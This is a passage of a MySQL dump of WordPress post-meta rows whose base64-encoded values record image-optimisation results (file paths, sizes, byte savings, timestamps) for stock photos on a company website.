YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4MTQsInRpbWUiOjE0ODM1ODQwMjIsImlkIjo3MDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQwNSwidGltZSI6MTQ4MzU4NDAyNSwiaWQiOjcwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDI1LCJ0aW1lIjoxNDgzNTg0MDI4LCJpZCI6NzA2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo1MTQsInRpbWUiOjE0ODM1ODQwMzIsImlkIjo3MDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjQ5NywidGltZSI6MTQ4MzU4NDAzNSwiaWQiOjcwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NTQ4LCJ0aW1lIjoxNDgzNTg0MDM5LCJpZCI6NzA2fV0='); 
INSERT INTO `wp_postmeta` VALUES (30073, 705, 'wpfc_optimisation_reduction', '9975'); 
INSERT INTO `wp_postmeta` VALUES (30074, 705, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDA0NCwiaWQiOiI3MDUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NDI3LCJ0aW1lIjoxNDgzNTg0MDQ3LCJpZCI6NzA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6ODI2LCJ0aW1lIjoxNDgzNTg0MDUxLCJpZCI6NzA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6ODA5LCJ0aW1lIjoxNDgzNTg0MDU1LCJpZCI6NzA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozNzMwLCJ0aW1lIjoxNDgzNTg0MDU5LCJpZCI6NzA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDA3LCJ0aW1lIjoxNDgzNTg0MDYzLCJpZCI6NzA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6Mzg3LCJ0aW1lIjoxNDgzNTg0MDY2LCJpZCI6NzA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDAyLCJ0aW1lIjoxNDgzNTg0MDY5LCJpZCI6NzA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6Nzk3LCJ0aW1lIjoxNDgzNTg0MDczLCJpZCI6NzA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjozOTQsInRpbWUiOjE0ODM1ODQwNzcsImlkIjo3MDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjM5OCwidGltZSI6MTQ4MzU4NDA4MCwiaWQiOjcwNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDIzLCJ0aW1lIjoxNDgzNTg0MDgzLCJpZCI6NzA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo0NjcsInRpbWUiOjE0ODM1ODQwODgsImlkIjo3MDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI0MDUwNjYxLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyNDA1MDY2MS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjQwNTA2NjEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjUwOCwidGltZSI6MTQ4MzU4NDA5MiwiaWQiOjcwNX1d'); 
INSERT INTO `wp_postmeta` VALUES (30075, 704, 'wpfc_optimisation_reduction', '12829'); 
INSERT INTO `wp_postmeta` VALUES (30076, 704, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMuanBnIiwid2lkdGgiOjQ3ODcsImhlaWdodCI6MzY0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDA5NiwiaWQiOiI3MDQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTMzLCJ0aW1lIjoxNDgzNTg0MTAwLCJpZCI6NzA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtODAweDYxMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjYxMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTgwMHg2MTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My04MDB4NjEwLmpwZyIsInJlZHVjdGlvbiI6MTM5MSwidGltZSI6MTQ4MzU4NDEwNCwiaWQiOjcwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTc2OHg1ODUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1ODUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My03Njh4NTg1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtNzY4eDU4NS5qcGciLCJyZWR1Y3Rpb24iOjEyOTMsInRpbWUiOjE0ODM1ODQxMDgsImlkIjo3MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0xNjAweDEyMTkuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTIxOSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTE2MDB4MTIxOS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTE2MDB4MTIxOS5qcGciLCJyZWR1Y3Rpb24iOjU0MDgsInRpbWUiOjE0ODM1ODQxMTIsImlkIjo3MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0MzMsInRpbWUiOjE0ODM1ODQxMTYsImlkIjo3MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0yMDB4MjAwLmpw